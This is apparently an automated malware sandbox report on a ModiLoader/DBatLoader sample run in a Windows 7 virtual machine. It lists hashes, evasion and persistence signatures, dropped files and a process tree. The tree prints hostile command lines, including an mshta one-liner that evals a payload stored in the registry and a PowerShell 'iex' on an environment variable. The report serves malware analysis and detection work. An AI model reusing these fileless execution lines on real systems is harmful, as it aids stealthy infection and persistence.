Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2024 20:46

General

  • Target

    2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe

  • Size

    250KB

  • MD5

    2ba1c0b0c9458f637f49dfb4e8df4af8

  • SHA1

    90a29617f1d625d3c33e2f852bd989856ee72832

  • SHA256

    14a737941a547cce90d0b670863658693d7d6660cc36c102bccf8ef741848bff

  • SHA512

    d1d2146838d8f4763efc5bf2194d22ca728e42d89127c86c25f1ec6082117c6c93d37800cf8e13239f0256891449f7f1362299e4cf83ef38ddc11683330bbe3a

  • SSDEEP

    6144:BZxIRAs8p5ZNpAglT8wKjoVzODs4Bcn8y4pwBAR7VK4Fo+ufX6eH:BZxIA5FAs8fizAtmBABE4uxH

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 61 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\2ba1c0b0c9458f637f49dfb4e8df4af8_JaffaCakes118.exe"
      2⤵
        PID:2876
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:RT65vb="B";C2V=new%20ActiveXObject("WScript.Shell");UzYih4Q6D="MZN78KQy";TQky4=C2V.RegRead("HKLM\\software\\Wow6432Node\\5dxZ04D\\qNMjlX");ZEep7wV7="tTe2";eval(TQky4);sPakz1S="jtsi";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:liuqexb
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2148
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:2376

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\Local\529d1c\1bcd8a.lnk

        Filesize

        881B

        MD5

        7456158805a081526af24c02a7a6ae6d

        SHA1

        36db31bb5c4fd4a0ec3ed2d18ee9a94a0c256a2a

        SHA256

        92f81b0a82837322ec028154795ddddb8f9464f2a140a9b492b786e255f90637

        SHA512

        3b4eb5b8eaaad5f6d38bad47ef5be8508e679e84f1191c0f02abb85d90fc1f176170dda2f0e95d255362227c7eb2dab3a833876b8a2077b39cad77b2fc935c6e

      • C:\Users\Admin\AppData\Local\529d1c\4bd7f2.bat

        Filesize

        61B

        MD5

        7f145f9c460ee7bb55a3e7ad72a65f86

        SHA1

        39a73f2119c72ae27a166fff9ceb13859f6ac21b

        SHA256

        16e3704ce7a5f142fe817cd42cf9fd214341caf20a284c439457feb84515ddad

        SHA512

        1bfbf2931d904ae08d6552267b918e8f7e6cce6d142f0c950c74e2e601dc3cf36428fcddf67ad3cae1acb565edf4871c0c3c165be88c34d3c81b68b8d7c1a75f

      • C:\Users\Admin\AppData\Local\529d1c\7fd902.cbe78f1

        Filesize

        34KB

        MD5

        acd095cf322000838c36a72fa096a459

        SHA1

        140f80c3d1d01eebdce25209178a6e4f4537cbbd

        SHA256

        7bc51e006dd0d7eedbb9f0eef93217df2d3fab66063adbc0bde2f2022fa30c3b

        SHA512

        28f76377d1b9b42ae59ab79a81ef765e47340dc5866f9dbb898d568b32f53014ab6ff0517f2d1ddcf1957db3ada5b588bdfd22c6a331657557a128e6439deed1

      • C:\Users\Admin\AppData\Local\Temp\Tar24B7.tmp

        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Roaming\4f4be6\d3bc4d.cbe78f1

        Filesize

        32KB

        MD5

        f8b28811957a511896368d4ce846be65

        SHA1

        6912b736b99f8ea62aabbf2f7a37ad84f98408ba

        SHA256

        1545b2eb63c0c5abb6929c973be838f2c7158ddf5925cb931a079a634c04e30e

        SHA512

        444587ed231ae9b763b9d834d4e3e609c5380d95ea6eeca1a9f856ab989551e289df581e7c2ab7c8388679681867f9a48aa0f03e88aa64ba977b4104eea1f9cf

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk

        Filesize

        991B

        MD5

        3f20cf8378253a2d9d05b6e0b95288ee

        SHA1

        dbcaa66e8427bf3caef684ec46cdadea9852efcc

        SHA256

        5b3ea80e47b317f9ff96a1b5f279c8745614ffa8c98469db14ba26784726ea12

        SHA512

        205c38b547afeca8e3165a721a831a93c0e1ae87fd15918e52db37be0bb56664b68603bbcd5b4b366eca9731f5bc9025c4d264fd9d5aa06e22a551e33e65650a
